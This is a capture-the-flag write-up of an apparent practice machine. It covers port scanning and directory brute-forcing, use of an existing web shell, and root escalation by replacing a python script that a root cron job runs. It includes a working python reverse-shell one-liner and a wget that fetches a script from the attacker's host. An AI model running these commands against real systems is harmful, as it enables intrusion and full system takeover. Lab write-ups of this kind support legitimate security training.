Nmap scan for all TCP ports
sudo nmap -T4 -p- -oN T-all 10.10.10.68
# Nmap 7.70 scan initiated Tue Jul 2 23:33:14 2019 as: nmap -T4 -p- -oN T-all 10.10.10.68Nmap scan report for 10.10.10.68Host is up (0.24s latency).Not shown: 65534 closed portsPORT STATE SERVICE80/tcp open http# Nmap done at Tue Jul 2 23:44:27 2019 -- 1 IP address (1 host up) scanned in 672.99 seconds
Only 1 attack vector i.e. port 80 HTTP server.
sudo nmap -p 80 -sV -sC -oN O-Detailed 10.10.10.68
# Nmap 7.70 scan initiated Tue Jul 2 23:37:00 2019 as: nmap -p 80 -sV -sC -oN O-Detailed 10.10.10.68Nmap scan report for 10.10.10.68Host is up (0.23s latency).PORT STATE SERVICE VERSION80/tcp open http Apache httpd 2.4.18 ((Ubuntu))|_http-server-header: Apache/2.4.18 (Ubuntu)|_http-title: Arrexel's Development SiteService detection performed. Please report any incorrect results at https://nmap.org/submit/ .# Nmap done at Tue Jul 2 23:37:12 2019 -- 1 IP address (1 host up) scanned in 12.61 seconds
No searchsploit results for the particular version of the Apache HTTPd Server.
Ran gobuster on the server to get a few directories to explore
gobuster dir -t 50 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster-medium -u http://10.10.10.68
/uploads (Status: 301)/images (Status: 301)/php (Status: 301)/css (Status: 301)/dev (Status: 301)/js (Status: 301)/fonts (Status: 301)
Dev seemed interesting. However,
uploads was empty.
phpbash.php got us the web-shell already installed on the server with
> cat /home/arrexel/user.txt2c281***
Another thing to notice was user
www-data is able to run
scriptmanager without a password and there's an interesting folder owned by
scriptmanager in the root directory.
sudo -u scriptmanager ls -la /scripts
total 16drwxrwxr-- 2 scriptmanager scriptmanager 4096 Dec 4 2017 .drwxr-xr-x 23 root root 4096 Dec 4 2017 ..-rw-r--r-- 1 scriptmanager scriptmanager 58 Dec 4 2017 test.py-rw-r--r-- 1 root root 12 Jul 4 02:44 test.txt [TIME CHANGED]-------------------------------rw-r--r-- 1 root root 12 Jul 4 03:03 test.txt [TIME CHANGED]
LinEnum.sh I got a reverse shell from the existing web-shell. Using the python server I downloaded the
LinEnum.sh file onto the server and ran to see what all was interesting.
sudo -u scriptmanager python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.13",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' &
There was nothing too exciting in the output except the fact that there were some
crontabs registered for the user
root. As evident from the listings of the folder /scripts/ the text file was being generated every minute as stated above.
The code which was being run was
f = open("test.txt", "w")f.write("testing 123!")f.close
As evident from the permissions, this file can be modified by the
scriptmanager user and hence can be used to our leverage.
Craft the following python script on the attacker system, transfer, and replace the file on the machine and wait for the output.
import oscmd = "cat /root/root.txt > /tmp/root"os.system(cmd)
sudo -u scriptmanager wget http://10.10.14.13:9999/script.py -O /scripts/test.py
After 1 minute we will have our
root flag in the
> cat /tmp/rootcc4f0***
Having a closer look at suspiciously owned root files, as these may give out important information, as in this case the change in time every minute was the clue to a root owned